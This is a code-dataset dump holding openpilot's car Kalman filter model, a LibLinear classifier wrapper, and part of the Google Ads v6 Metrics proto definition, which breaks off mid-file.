repo_name (string) | path (string) | copies (string, 19 classes) | size (string) | content (string) | license (string, 15 classes) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool) |
---|---|---|---|---|---|---|---|---|---|---|
commaai/openpilot | selfdrive/locationd/models/car_kf.py | 1 | 4757 | #!/usr/bin/env python3
import math
import sys
from typing import Any, Dict
import numpy as np
from selfdrive.locationd.models.constants import ObservationKind
from selfdrive.swaglog import cloudlog
from rednose.helpers.kalmanfilter import KalmanFilter
if __name__ == '__main__': # Generating sympy
import sympy as sp
from rednose.helpers.ekf_sym import gen_code
else:
from rednose.helpers.ekf_sym_pyx import EKF_sym # pylint: disable=no-name-in-module, import-error
i = 0
def _slice(n):
global i
s = slice(i, i + n)
i += n
return s
class States():
# Vehicle model params
STIFFNESS = _slice(1) # [-]
STEER_RATIO = _slice(1) # [-]
ANGLE_OFFSET = _slice(1) # [rad]
ANGLE_OFFSET_FAST = _slice(1) # [rad]
VELOCITY = _slice(2) # (x, y) [m/s]
YAW_RATE = _slice(1) # [rad/s]
STEER_ANGLE = _slice(1) # [rad]
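# Taken together, the slices above define an 8-dimensional state vector
# (matching CarKalman.initial_x below):
#   x[0] stiffness factor, x[1] steer ratio, x[2] angle offset, x[3] fast angle offset,
#   x[4:6] velocity (x, y), x[6] yaw rate, x[7] steer angle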
class CarKalman(KalmanFilter):
name = 'car'
initial_x = np.array([
1.0,
15.0,
0.0,
0.0,
10.0, 0.0,
0.0,
0.0,
])
# process noise
Q = np.diag([
(.05 / 100)**2,
.01**2,
math.radians(0.02)**2,
math.radians(0.25)**2,
.1**2, .01**2,
math.radians(0.1)**2,
math.radians(0.1)**2,
])
P_initial = Q.copy()
obs_noise: Dict[int, Any] = {
ObservationKind.STEER_ANGLE: np.atleast_2d(math.radians(0.01)**2),
ObservationKind.ANGLE_OFFSET_FAST: np.atleast_2d(math.radians(10.0)**2),
ObservationKind.STEER_RATIO: np.atleast_2d(5.0**2),
ObservationKind.STIFFNESS: np.atleast_2d(5.0**2),
ObservationKind.ROAD_FRAME_X_SPEED: np.atleast_2d(0.1**2),
}
global_vars = [
'mass',
'rotational_inertia',
'center_to_front',
'center_to_rear',
'stiffness_front',
'stiffness_rear',
]
@staticmethod
def generate_code(generated_dir):
dim_state = CarKalman.initial_x.shape[0]
name = CarKalman.name
# The vehicle model comes from The Science of Vehicle Dynamics: Handling, Braking, and Ride of Road and Race Cars
# The model used is the one in 6.15, with the formula from 6.198
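# For reference, the matrices assembled below encode the linear dynamic bicycle model
# in lateral velocity v and yaw rate r, driven by the (offset-corrected) steering angle:
#   [v_dot]   [ -(cF+cR)/(m*u)          -(cF*aF - cR*aR)/(m*u) - u ] [v]   [ cF/(m*sR)    ]
#   [r_dot] = [ -(cF*aF - cR*aR)/(j*u)  -(cF*aF^2 + cR*aR^2)/(j*u) ] [r] + [ cF*aF/(j*sR) ] * steer
# (This comment is a reading aid inferred from the code below, not part of the original source.)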
# globals
global_vars = [sp.Symbol(name) for name in CarKalman.global_vars]
m, j, aF, aR, cF_orig, cR_orig = global_vars
# make functions and jacobians with sympy
# state variables
state_sym = sp.MatrixSymbol('state', dim_state, 1)
state = sp.Matrix(state_sym)
# Vehicle model constants
x = state[States.STIFFNESS, :][0, 0]
cF, cR = x * cF_orig, x * cR_orig
angle_offset = state[States.ANGLE_OFFSET, :][0, 0]
angle_offset_fast = state[States.ANGLE_OFFSET_FAST, :][0, 0]
sa = state[States.STEER_ANGLE, :][0, 0]
sR = state[States.STEER_RATIO, :][0, 0]
u, v = state[States.VELOCITY, :]
r = state[States.YAW_RATE, :][0, 0]
A = sp.Matrix(np.zeros((2, 2)))
A[0, 0] = -(cF + cR) / (m * u)
A[0, 1] = -(cF * aF - cR * aR) / (m * u) - u
A[1, 0] = -(cF * aF - cR * aR) / (j * u)
A[1, 1] = -(cF * aF**2 + cR * aR**2) / (j * u)
B = sp.Matrix(np.zeros((2, 1)))
B[0, 0] = cF / m / sR
B[1, 0] = (cF * aF) / j / sR
x = sp.Matrix([v, r]) # lateral velocity, yaw rate
x_dot = A * x + B * (sa - angle_offset - angle_offset_fast)
dt = sp.Symbol('dt')
state_dot = sp.Matrix(np.zeros((dim_state, 1)))
state_dot[States.VELOCITY.start + 1, 0] = x_dot[0]
state_dot[States.YAW_RATE.start, 0] = x_dot[1]
# Basic discretization, 1st-order integrator
# Can be pretty bad if dt is big
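# i.e. x_{k+1} = x_k + dt * x_dot(x_k) (forward Euler), as encoded on the next line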
f_sym = state + dt * state_dot
#
# Observation functions
#
obs_eqs = [
[sp.Matrix([r]), ObservationKind.ROAD_FRAME_YAW_RATE, None],
[sp.Matrix([u, v]), ObservationKind.ROAD_FRAME_XY_SPEED, None],
[sp.Matrix([u]), ObservationKind.ROAD_FRAME_X_SPEED, None],
[sp.Matrix([sa]), ObservationKind.STEER_ANGLE, None],
[sp.Matrix([angle_offset_fast]), ObservationKind.ANGLE_OFFSET_FAST, None],
[sp.Matrix([sR]), ObservationKind.STEER_RATIO, None],
[sp.Matrix([x]), ObservationKind.STIFFNESS, None],
]
gen_code(generated_dir, name, f_sym, dt, state_sym, obs_eqs, dim_state, dim_state, global_vars=global_vars)
def __init__(self, generated_dir, steer_ratio=15, stiffness_factor=1, angle_offset=0): # pylint: disable=super-init-not-called
dim_state = self.initial_x.shape[0]
dim_state_err = self.P_initial.shape[0]
x_init = self.initial_x
x_init[States.STEER_RATIO] = steer_ratio
x_init[States.STIFFNESS] = stiffness_factor
x_init[States.ANGLE_OFFSET] = angle_offset
# init filter
self.filter = EKF_sym(generated_dir, self.name, self.Q, self.initial_x, self.P_initial, dim_state, dim_state_err, global_vars=self.global_vars, logger=cloudlog)
if __name__ == "__main__":
generated_dir = sys.argv[2]
CarKalman.generate_code(generated_dir)
| mit | 7,562,025,558,407,216,000 | 27.656627 | 164 | 0.615304 | false |
excelly/xpy-ml | ex/ml/liblinear.py | 1 | 3853 | from common import *
import ex.ml.libsvm.linearutil as lu
def a2l(X, y = None):
'''convert arrays to list
'''
if y is not None:
y = y.tolist()
if issparse(X):
X = [dict(zip(find(row)[1], row.data)) for row in X]
else:
X = X.tolist()
if y is not None:
return (X, y)
else:
return X
class LibLinear:
'''liblinear
'''
def __init__(self):
self.n, self.dim, self.options, self.model, self.ulabels, self.preproc_param = [None]*6
def Train(self, X, y, options = None):
''' train liblinear model
'''
# process labels
y = int32(y)
self.ulabels = unique(y)
K = len(self.ulabels)
check(K > 1, 'needs at least 2 classes')
y = EncodeArray(y, self.ulabels)
# process features
self.n, self.dim = X.shape
X, self.preproc_param = Normalize(X, '+-1', 'col')
# train
X, y = a2l(X, y)
if options is None: # default parameter
options = ''
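# Note: the flags appended below follow LIBLINEAR's documented train options:
# '-B 1' appends a bias term to each instance and '-q' runs the solver in quiet
# mode (stated as an assumption about the wrapped liblinear version).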
self.model = lu.train(y, X, options + ' -B 1 -q')
def Predict(self, X):
''' predict for test data
'''
# apply preprocessing
X = Normalize(X, self.preproc_param, 'col')[0]
X = a2l(X)
t, acc, P = lu.predict(zeros(len(X), dtype = int32), X, self.model, '')
t = arr(t, dtype = 'int32')
P = arr(P)
# extract results
t = self.ulabels[t]
p=P.max(1)
return (t, p, P)
def CV(self, nfolds, X, y, options = None, verbose = True, poolsize = 1):
''' get cross-validation performance
'''
cvo = CVObject(y.size, nfolds)
if verbose:
log.info('Cross-validating MultiLogistic. Data = {0}'.format(X.shape))
log.info(cvo)
trI, teI, perf = cvo.CV(ipred, X, y, options, poolsize)
t, p = unzip(perf)
idx = arr(Flatten(teI))
t = arr(Flatten(t), int32)
p = arr(Flatten(p))
t[idx]=t.copy()
p[idx]=p.copy()
return (t, p)
def Clone(self):
return deepcopy(self)
def Save(self, filename):
SavePickle(filename, self)
def Load(self, filename):
o=LoadPickles(filename)
Copy(o, self)
def Plot(self, xlim, ylim, color = 'label', gridsize = 50):
'''plot the current classifier
'''
check(self.dim == 2, 'can only plot in 2-D space')
X, Y = MeshGrid(linspace(xlim[0], xlim[1], gridsize),
linspace(ylim[0], ylim[1], gridsize))
F = hstack((col(X), col(Y)))
y, p = self.Predict(F)[:2]
if color == 'label':
scatter(X.ravel(), Y.ravel(), c = y, edgecolors = 'none')
elif color == 'prob':
scatter(X.ravel(), Y.ravel(), c = p, vmin = 0, vmax = 1, edgecolors = 'none')
draw()
def ipred(trI, teI, X, y, options):
'''used for cross validation
'''
model = LibLinear()
model.Train(X[trI], y[trI], options)
t, p, P = model.Predict(X[teI])
return (t.tolist(), p.tolist())
if __name__ == '__main__':
InitLog()
n = 100
pts = vstack((repmat(linspace(-1, 1, n/2), (1, 2)),
hstack((sin(linspace(0, 10, n/2)) + 1, sin(linspace(0, 10, n/2)) - 1)))).T
y = cat((ones(n/2)*3, ones(n/2)*7))
model = LibLinear()
t, p = model.CV(10, pts, y)
acc = (t == y).mean()
print '** Acc: %f' % acc
test(acc > 0.95, "LibSVM Train & Test & CV")
model.Train(pts, y)
t, p, P = model.Predict(pts)
acc = (y == t).mean()
print '** Acc: %f' % acc
subplot(gcf(), 131);
plot(pts[:,0], pts[:,1], '+')
subplot(gcf(), 132)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'label', 100)
subplot(gcf(), 133)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'prob', 100)
show()
| apache-2.0 | -1,892,333,781,465,634,600 | 24.516556 | 95 | 0.509473 | false |
googleads/google-ads-python | google/ads/googleads/v6/common/types/metrics.py | 1 | 42787 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import interaction_event_type
from google.ads.googleads.v6.enums.types import quality_score_bucket
__protobuf__ = proto.module(
package="google.ads.googleads.v6.common",
marshal="google.ads.googleads.v6",
manifest={"Metrics",},
)
class Metrics(proto.Message):
r"""Metrics data.
Attributes:
absolute_top_impression_percentage (float):
The percent of your ad impressions that are
shown as the very first ad above the organic
search results.
active_view_cpm (float):
Average cost of viewable impressions
(``active_view_impressions``).
active_view_ctr (float):
Active view measurable clicks divided by
active view viewable impressions. This metric is
reported only for display network.
active_view_impressions (int):
A measurement of how often your ad has become
viewable on a Display Network site.
active_view_measurability (float):
The ratio of impressions that could be
measured by Active View over the number of
served impressions.
active_view_measurable_cost_micros (int):
The cost of the impressions you received that
were measurable by Active View.
active_view_measurable_impressions (int):
The number of times your ads are appearing on
placements in positions where they can be seen.
active_view_viewability (float):
The percentage of time when your ad appeared
on an Active View enabled site (measurable
impressions) and was viewable (viewable
impressions).
all_conversions_from_interactions_rate (float):
All conversions from interactions (as opposed
to view through conversions) divided by the
number of ad interactions.
all_conversions_value (float):
The value of all conversions.
all_conversions_value_by_conversion_date (float):
The value of all conversions. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric.
all_conversions_by_conversion_date (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions_value_per_cost (float):
The value of all conversions divided by the
total cost of ad interactions (such as clicks
for text ads or views for video ads).
all_conversions_from_click_to_call (float):
The number of times people clicked the "Call"
button to call a store during or after clicking
an ad. This number doesn't include whether or
not calls were connected, or the duration of any
calls. This metric applies to feed items only.
all_conversions_from_directions (float):
The number of times people clicked a "Get
directions" button to navigate to a store after
clicking an ad. This metric applies to feed
items only.
all_conversions_from_interactions_value_per_interaction (float):
The value of all conversions from
interactions divided by the total number of
interactions.
all_conversions_from_menu (float):
The number of times people clicked a link to
view a store's menu after clicking an ad.
This metric applies to feed items only.
all_conversions_from_order (float):
The number of times people placed an order at
a store after clicking an ad. This metric
applies to feed items only.
all_conversions_from_other_engagement (float):
The number of other conversions (for example,
posting a review or saving a location for a
store) that occurred after people clicked an ad.
This metric applies to feed items only.
all_conversions_from_store_visit (float):
Estimated number of times people visited a
store after clicking an ad. This metric applies
to feed items only.
all_conversions_from_store_website (float):
The number of times that people were taken to
a store's URL after clicking an ad.
This metric applies to feed items only.
average_cost (float):
The average amount you pay per interaction.
This amount is the total cost of your ads
divided by the total number of interactions.
average_cpc (float):
The total cost of all clicks divided by the
total number of clicks received.
average_cpe (float):
The average amount that you've been charged
for an ad engagement. This amount is the total
cost of all ad engagements divided by the total
number of ad engagements.
average_cpm (float):
Average cost-per-thousand impressions (CPM).
average_cpv (float):
The average amount you pay each time someone
views your ad. The average CPV is defined by the
total cost of all ad views divided by the number
of views.
average_page_views (float):
Average number of pages viewed per session.
average_time_on_site (float):
Total duration of all sessions (in seconds) /
number of sessions. Imported from Google
Analytics.
benchmark_average_max_cpc (float):
An indication of how other advertisers are
bidding on similar products.
benchmark_ctr (float):
An indication on how other advertisers'
Shopping ads for similar products are performing
based on how often people who see their ad click
on it.
bounce_rate (float):
Percentage of clicks where the user only
visited a single page on your site. Imported
from Google Analytics.
clicks (int):
The number of clicks.
combined_clicks (int):
The number of times your ad or your site's
listing in the unpaid results was clicked. See
the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
combined_clicks_per_query (float):
The number of times your ad or your site's listing in the
unpaid results was clicked (combined_clicks) divided by
combined_queries. See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
combined_queries (int):
The number of searches that returned pages
from your site in the unpaid results or showed
one of your text ads. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
content_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Display Network but
didn't because your budget was too low. Note:
Content budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
content_impression_share (float):
The impressions you've received on the
Display Network divided by the estimated number
of impressions you were eligible to receive.
Note: Content impression share is reported in
the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
conversion_last_received_request_date_time (str):
The last date/time a conversion tag for this
conversion action successfully fired and was
seen by Google Ads. This firing event may not
have been the result of an attributable
conversion (e.g. because the tag was fired from
a browser that did not previously click an ad
from an appropriate advertiser). The date/time
is in the customer's time zone.
conversion_last_conversion_date (str):
The date of the most recent conversion for
this conversion action. The date is in the
customer's time zone.
content_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Display Network that your ads didn't receive
due to poor Ad Rank. Note: Content rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
conversions_from_interactions_rate (float):
Conversions from interactions divided by the number of ad
interactions (such as clicks for text ads or views for video
ads). This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_value (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_value_by_conversion_date (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
conversions_value_per_cost (float):
The value of conversions divided by the cost of ad
interactions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_from_interactions_value_per_interaction (float):
The value of conversions from interactions divided by the
number of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_by_conversion_date (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
cost_micros (int):
The sum of your cost-per-click (CPC) and
cost-per-thousand impressions (CPM) costs during
this period.
cost_per_all_conversions (float):
The cost of ad interactions divided by all
conversions.
cost_per_conversion (float):
The cost of ad interactions divided by conversions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
cost_per_current_model_attributed_conversion (float):
The cost of ad interactions divided by current model
attributed conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
cross_device_conversions (float):
Conversions from when a customer clicks on a Google Ads ad
on one device, then converts on a different device or
browser. Cross-device conversions are already included in
all_conversions.
ctr (float):
The number of clicks your ad receives
(Clicks) divided by the number of times your ad
is shown (Impressions).
current_model_attributed_conversions (float):
Shows how your historic conversions data would look under
the attribution model you've currently selected. This only
includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_from_interactions_rate (float):
Current model attributed conversions from interactions
divided by the number of ad interactions (such as clicks for
text ads or views for video ads). This only includes
conversion actions which include_in_conversions_metric
attribute is set to true. If you use conversion-based
bidding, your bid strategies will optimize for these
conversions.
current_model_attributed_conversions_from_interactions_value_per_interaction (float):
The value of current model attributed conversions from
interactions divided by the number of ad interactions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value (float):
The value of current model attributed conversions. This only
includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value_per_cost (float):
The value of current model attributed conversions divided by
the cost of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
engagement_rate (float):
How often people engage with your ad after
it's shown to them. This is the number of ad
expansions divided by the number of times your
ad is shown.
engagements (int):
The number of engagements.
An engagement occurs when a viewer expands your
Lightbox ad. Also, in the future, other ad types
may support engagement metrics.
hotel_average_lead_value_micros (float):
Average lead value based on clicks.
hotel_price_difference_percentage (float):
The average price difference between the
price offered by reporting hotel advertiser and
the cheapest price offered by the competing
advertiser.
hotel_eligible_impressions (int):
The number of impressions that hotel partners
could have had given their feed performance.
historical_creative_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The creative historical quality score.
historical_landing_page_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The quality of historical landing page
experience.
historical_quality_score (int):
The historical quality score.
historical_search_predicted_ctr (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The historical search predicted click through
rate (CTR).
gmail_forwards (int):
The number of times the ad was forwarded to
someone else as a message.
gmail_saves (int):
The number of times someone has saved your
Gmail ad to their inbox as a message.
gmail_secondary_clicks (int):
The number of clicks to the landing page on
the expanded state of Gmail ads.
impressions_from_store_reach (int):
The number of times a store's location-based
ad was shown. This metric applies to feed items
only.
impressions (int):
Count of how often your ad has appeared on a
search results page or website on the Google
Network.
interaction_rate (float):
How often people interact with your ad after
it is shown to them. This is the number of
interactions divided by the number of times your
ad is shown.
interactions (int):
The number of interactions.
An interaction is the main user action
associated with an ad format-clicks for text and
shopping ads, views for video ads, and so on.
interaction_event_types (Sequence[google.ads.googleads.v6.enums.types.InteractionEventTypeEnum.InteractionEventType]):
The types of payable and free interactions.
invalid_click_rate (float):
The percentage of clicks filtered out of your
total number of clicks (filtered + non-filtered
clicks) during the reporting period.
invalid_clicks (int):
Number of clicks Google considers
illegitimate and doesn't charge you for.
message_chats (int):
Number of message chats initiated for Click
To Message impressions that were message
tracking eligible.
message_impressions (int):
Number of Click To Message impressions that
were message tracking eligible.
message_chat_rate (float):
Number of message chats initiated (message_chats) divided by
the number of message impressions (message_impressions).
Rate at which a user initiates a message chat from an ad
impression with a messaging option and message tracking
enabled. Note that this rate can be more than 1.0 for a
given message impression.
mobile_friendly_clicks_percentage (float):
The percentage of mobile clicks that go to a
mobile-friendly page.
organic_clicks (int):
The number of times someone clicked your
site's listing in the unpaid results for a
particular query. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
organic_clicks_per_query (float):
The number of times someone clicked your site's listing in
the unpaid results (organic_clicks) divided by the total
number of searches that returned pages from your site
(organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_impressions (int):
The number of listings for your site in the
unpaid search results. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
organic_impressions_per_query (float):
The number of times a page from your site was listed in the
unpaid search results (organic_impressions) divided by the
number of searches returning your site's listing in the
unpaid results (organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_queries (int):
The total number of searches that returned
your site's listing in the unpaid results. See
the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
percent_new_visitors (float):
Percentage of first-time sessions (from
people who had never visited your site before).
Imported from Google Analytics.
phone_calls (int):
Number of offline phone calls.
phone_impressions (int):
Number of offline phone impressions.
phone_through_rate (float):
Number of phone calls received (phone_calls) divided by the
number of times your phone number is shown
(phone_impressions).
relative_ctr (float):
Your clickthrough rate (Ctr) divided by the
average clickthrough rate of all advertisers on
the websites that show your ads. Measures how
your ads perform on Display Network sites
compared to other ads on the same sites.
search_absolute_top_impression_share (float):
The percentage of the customer's Shopping or
Search ad impressions that are shown in the most
prominent Shopping position. See
https://support.google.com/google-
ads/answer/7501826 for details. Any value below
0.1 is reported as 0.0999.
search_budget_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to a low budget. Note: Search
budget lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Search Network but
didn't because your budget was too low. Note:
Search budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_budget_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to a low budget. Note: Search budget
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_click_share (float):
The number of clicks you've received on the
Search Network divided by the estimated number
of clicks you were eligible to receive. Note:
Search click share is reported in the range of
0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_exact_match_impression_share (float):
The impressions you've received divided by
the estimated number of impressions you were
eligible to receive on the Search Network for
search terms that matched your keywords exactly
(or were close variants of your keyword),
regardless of your keyword match types. Note:
Search exact match impression share is reported
in the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
search_impression_share (float):
The impressions you've received on the Search
Network divided by the estimated number of
impressions you were eligible to receive. Note:
Search impression share is reported in the range
of 0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_rank_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to poor Ad Rank. Note: Search
rank lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Search Network that your ads didn't receive
due to poor Ad Rank. Note: Search rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
search_rank_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to poor Ad Rank. Note: Search rank
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_top_impression_share (float):
The impressions you've received in the top
location (anywhere above the organic search
results) compared to the estimated number of
impressions you were eligible to receive in the
top location. Note: Search top impression share
is reported in the range of 0.1 to 1. Any value
below 0.1 is reported as 0.0999.
speed_score (int):
A measure of how quickly your page loads
after clicks on your mobile ads. The score is a
range from 1 to 10, 10 being the fastest.
top_impression_percentage (float):
The percent of your ad impressions that are
shown anywhere above the organic search results.
valid_accelerated_mobile_pages_clicks_percentage (float):
The percentage of ad clicks to Accelerated
Mobile Pages (AMP) landing pages that reach a
valid AMP page.
value_per_all_conversions (float):
The value of all conversions divided by the
number of all conversions.
value_per_all_conversions_by_conversion_date (float):
The value of all conversions divided by the number of all
conversions. When this column is selected with date, the
values in date column means the conversion date. Details for
the by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
value_per_conversion (float):
The value of conversions divided by the number of
conversions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
value_per_conversions_by_conversion_date (float):
The value of conversions divided by the number of
conversions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
value_per_current_model_attributed_conversion (float):
The value of current model attributed conversions divided by
the number of the conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
video_quartile_p100_rate (float):
Percentage of impressions where the viewer
watched all of your video.
video_quartile_p25_rate (float):
Percentage of impressions where the viewer
watched 25% of your video.
video_quartile_p50_rate (float):
Percentage of impressions where the viewer
watched 50% of your video.
video_quartile_p75_rate (float):
Percentage of impressions where the viewer
watched 75% of your video.
video_view_rate (float):
The number of views your TrueView video ad
receives divided by its number of impressions,
including thumbnail impressions for TrueView in-
display ads.
video_views (int):
The number of times your video ads were
viewed.
view_through_conversions (int):
The total number of view-through conversions.
These happen when a customer sees an image or
rich media ad, then later completes a conversion
on your site without interacting with (e.g.,
clicking on) another ad.
"""
absolute_top_impression_percentage = proto.Field(
proto.DOUBLE, number=183, optional=True
)
active_view_cpm = proto.Field(proto.DOUBLE, number=184, optional=True)
active_view_ctr = proto.Field(proto.DOUBLE, number=185, optional=True)
active_view_impressions = proto.Field(
proto.INT64, number=186, optional=True
)
active_view_measurability = proto.Field(
proto.DOUBLE, number=187, optional=True
)
active_view_measurable_cost_micros = proto.Field(
proto.INT64, number=188, optional=True
)
active_view_measurable_impressions = proto.Field(
proto.INT64, number=189, optional=True
)
active_view_viewability = proto.Field(
proto.DOUBLE, number=190, optional=True
)
all_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=191, optional=True
)
all_conversions_value = proto.Field(proto.DOUBLE, number=192, optional=True)
all_conversions_value_by_conversion_date = proto.Field(
proto.DOUBLE, number=240
)
all_conversions = proto.Field(proto.DOUBLE, number=193, optional=True)
all_conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=241)
all_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=194, optional=True
)
all_conversions_from_click_to_call = proto.Field(
proto.DOUBLE, number=195, optional=True
)
all_conversions_from_directions = proto.Field(
proto.DOUBLE, number=196, optional=True
)
all_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=197, optional=True
)
all_conversions_from_menu = proto.Field(
proto.DOUBLE, number=198, optional=True
)
all_conversions_from_order = proto.Field(
proto.DOUBLE, number=199, optional=True
)
all_conversions_from_other_engagement = proto.Field(
proto.DOUBLE, number=200, optional=True
)
all_conversions_from_store_visit = proto.Field(
proto.DOUBLE, number=201, optional=True
)
all_conversions_from_store_website = proto.Field(
proto.DOUBLE, number=202, optional=True
)
average_cost = proto.Field(proto.DOUBLE, number=203, optional=True)
average_cpc = proto.Field(proto.DOUBLE, number=204, optional=True)
average_cpe = proto.Field(proto.DOUBLE, number=205, optional=True)
average_cpm = proto.Field(proto.DOUBLE, number=206, optional=True)
average_cpv = proto.Field(proto.DOUBLE, number=207, optional=True)
average_page_views = proto.Field(proto.DOUBLE, number=208, optional=True)
average_time_on_site = proto.Field(proto.DOUBLE, number=209, optional=True)
benchmark_average_max_cpc = proto.Field(
proto.DOUBLE, number=210, optional=True
)
benchmark_ctr = proto.Field(proto.DOUBLE, number=211, optional=True)
bounce_rate = proto.Field(proto.DOUBLE, number=212, optional=True)
clicks = proto.Field(proto.INT64, number=131, optional=True)
combined_clicks = proto.Field(proto.INT64, number=156, optional=True)
combined_clicks_per_query = proto.Field(
proto.DOUBLE, number=157, optional=True
)
combined_queries = proto.Field(proto.INT64, number=158, optional=True)
content_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=159, optional=True
)
content_impression_share = proto.Field(
proto.DOUBLE, number=160, optional=True
)
conversion_last_received_request_date_time = proto.Field(
proto.STRING, number=161, optional=True
)
conversion_last_conversion_date = proto.Field(
proto.STRING, number=162, optional=True
)
content_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=163, optional=True
)
conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=164, optional=True
)
conversions_value = proto.Field(proto.DOUBLE, number=165, optional=True)
conversions_value_by_conversion_date = proto.Field(proto.DOUBLE, number=242)
conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=166, optional=True
)
conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=167, optional=True
)
conversions = proto.Field(proto.DOUBLE, number=168, optional=True)
conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=243)
cost_micros = proto.Field(proto.INT64, number=169, optional=True)
cost_per_all_conversions = proto.Field(
proto.DOUBLE, number=170, optional=True
)
cost_per_conversion = proto.Field(proto.DOUBLE, number=171, optional=True)
cost_per_current_model_attributed_conversion = proto.Field(
